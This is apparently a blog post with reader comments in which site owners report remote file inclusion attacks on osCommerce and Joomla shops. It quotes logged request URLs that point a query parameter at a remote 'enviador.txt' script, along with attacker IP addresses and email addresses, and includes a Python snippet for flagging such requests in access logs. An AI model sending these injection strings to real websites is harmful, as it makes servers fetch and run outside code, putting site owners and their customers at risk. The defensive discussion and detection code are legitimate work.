Another hacker trying to inject a PHP script located at:
http://www.1004smile.com/data/enviador.txt
[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=&para=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com
This has something to do with the OSCOMMERCE search routine.
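One way to flag this request pattern when reviewing access logs, as an added example that is not part of the original post. The function names, the `url_params` allowlist and the sample requests are assumptions, and the samples are constructed with reserved example domains:

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A parameter value that begins with a remote scheme is the common signature of
# the requests quoted in this post (categories_id=http://host/enviador.txt?).
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

def rfi_params(request_target, url_params=frozenset()):
    """Return [(param, remote_host)] for query parameters carrying a remote URL.

    url_params: names that legitimately take a URL on this site (assumption:
    the operator maintains this list); they are skipped.
    """
    query = request_target.partition("?")[2]
    hits = []
    # parse_qsl percent-decodes once; unquote() again catches double encoding.
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value)
        if name not in url_params and REMOTE_VALUE.match(value):
            hits.append((name, urlsplit(value.strip()).hostname))
    return hits

def scan(request_targets, url_params=frozenset()):
    """Map each flagged request target to its hits; clean requests are omitted."""
    report = {}
    for target in request_targets:
        hits = rfi_params(target, url_params)
        if hits:
            report[target] = hits
    return report

# Constructed sample requests modelled on the log entry above; hosts use
# reserved example domains, not the ones from the post.
SAMPLE = [
    "/advanced_search_result.php?categories_id=http://payload.example/enviador.txt?"
    "&servidor=www.shop.example/advanced_search_result.php?categories_id="
    "&para=someone@mail.example",
    "/index.php?p=http%3A%2F%2Fpayload.example%3A8080%2Fenviador.txt%3F",
    "/index.php?p=contact",
    "/login.php?return=https://www.shop.example/account.php",
]

if __name__ == "__main__":
    for target, hits in scan(SAMPLE, url_params={"return"}).items():
        print(hits, target[:60])
```

Matching on the request shape rather than on source IP or user agent keeps the check effective when those change between attempts.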
10 comments:
also
http://www.neobundao.com/enviador.txt?&servidor=
and
http://www.darkhand.net/Bots/enviador.txt?&
Another one http://www.opengear.at/rotator/enviador.txt
hacker also using email kbtcone@yahoo.com and enviador.txt file to attack oscommerce sites
who the hell they are ... trying same on 4 of my websites... URL:[/index.php?p=http://premmy.myftp.biz:8080/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com][/index.php?p=http://www.fpe.sn/webcam/enviador.txt?&servidor=www.talentcapital.ae/index.php?p=&para=premmy35@gmail.com] From IP:{173.201.253.28, 194.24.252.101, 200.58.112.125, 200.80.36.148, 202.67.226.122, 208.109.186.113, 208.109.98.121, 218.189.139.238, 41.208.148.72, 62.156.178.189, 69.175.85.82, 72.167.48.2} I think we must block these IP
Not just OSCommerce websites are affected. Joomla sites are also vulnerable to this attack, usually with the e-mail address premmy35@gmail.com
I detect this kind of attack on my websites on an almost daily basis. What can be done for this to be stopped permanently?
[BVS]
@Abhishek Sachan - blocking the IP addresses was also something that came into my mind but I'm afraid it won't do any good as the attacker(s) use another IP every time. I have detected attempts originating from Taiwanese, Russian, Polish, Iranian and German addresses.
[BVS]
yeah you are right.. blocking IP is something difficult for them but I have something new in my mind not implemented yet... we can detect their user_agents, they are generally of type bots.. there are databases present online which can tell you about the user agents, we can block them by scripts but this method can also fail because it's easy to change user agent...
If you install M&M Autoban you can ban the action they are taking; it will then take care of banning the IPs it detects doing this.
Add the URLs and email addresses to the hackers file. In most cases they are already in it. Look for a new version soon as the next upgrade will let you ban countries you do not want on your site.
I also detect in my web server logs a similar attack but using "sexycabrito@gmail.com" instead of "premy35@gmail.com". Can someone please give me more explanation about the mechanism of this attack?
best regards
hello
I have the same logs appearing in my web server but using "sexycabrito@gmail.com" instead of "premy35@gmail.com". Can anybody give me more explanation about these attacks?
thanks
best regards